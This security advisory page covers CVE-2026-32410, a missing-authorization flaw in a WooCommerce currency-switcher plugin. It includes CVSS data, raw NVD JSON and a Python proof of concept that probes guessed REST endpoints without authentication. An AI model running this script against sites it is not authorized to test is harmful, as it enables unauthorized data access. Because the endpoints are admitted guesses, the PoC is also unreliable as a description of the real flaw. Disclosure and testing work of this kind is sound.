Security Vulnerability Report
中文
CVE-2026-32410 CVSS 5.3 MEDIUM

CVE-2026-32410

Published: 2026-03-13 19:54:58
Last Modified: 2026-04-29 10:17:07

Description

Missing Authorization vulnerability in WBW Plugins WBW Currency Switcher for WooCommerce woo-currency allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WBW Currency Switcher for WooCommerce: from n/a through <= 2.2.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WBW Currency Switcher for WooCommerce (woo-currency) <= 2.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32410 PoC - Missing Authorization in WBW Currency Switcher # This PoC demonstrates accessing protected endpoints without authentication import requests import json TARGET_URL = "http://target-site.com/wp-json/" def check_vulnerability(): """ Test for missing authorization in woo-currency plugin endpoints """ # Common endpoints that might be affected endpoints = [ "woo-currency/v1/settings", "woo-currency/v1/rates", "woo-currency/v1/config", "?rest_route=/woo-currency/v1/settings", "?rest_route=/woo-currency/v1/rates" ] results = [] for endpoint in endpoints: url = TARGET_URL + endpoint try: # Request without authentication headers response = requests.get(url, timeout=10) # Check if we get a successful response (200) instead of 401/403 if response.status_code == 200: results.append({ "endpoint": endpoint, "status": "VULNERABLE", "status_code": response.status_code, "data": response.text[:500] if response.text else None }) else: results.append({ "endpoint": endpoint, "status": "PROTECTED", "status_code": response.status_code }) except requests.RequestException as e: results.append({ "endpoint": endpoint, "status": "ERROR", "error": str(e) }) return results if __name__ == "__main__": print("CVE-2026-32410 - WBW Currency Switcher Authorization Check") print("=" * 60) results = check_vulnerability() print(json.dumps(results, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32410", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:57.810", "lastModified": "2026-04-29T10:17:06.990", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WBW Plugins WBW Currency Switcher for WooCommerce woo-currency allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WBW Currency Switcher for WooCommerce: from n/a through <= 2.2.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en WBW Plugins WBW Currency Switcher para WooCommerce woo-currency permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WBW Currency Switcher para WooCommerce: desde n/a hasta &lt;= 2.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-currency/vulnerability/wordpress-wbw-currency-switcher-for-woocommerce-plugin-2-2-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}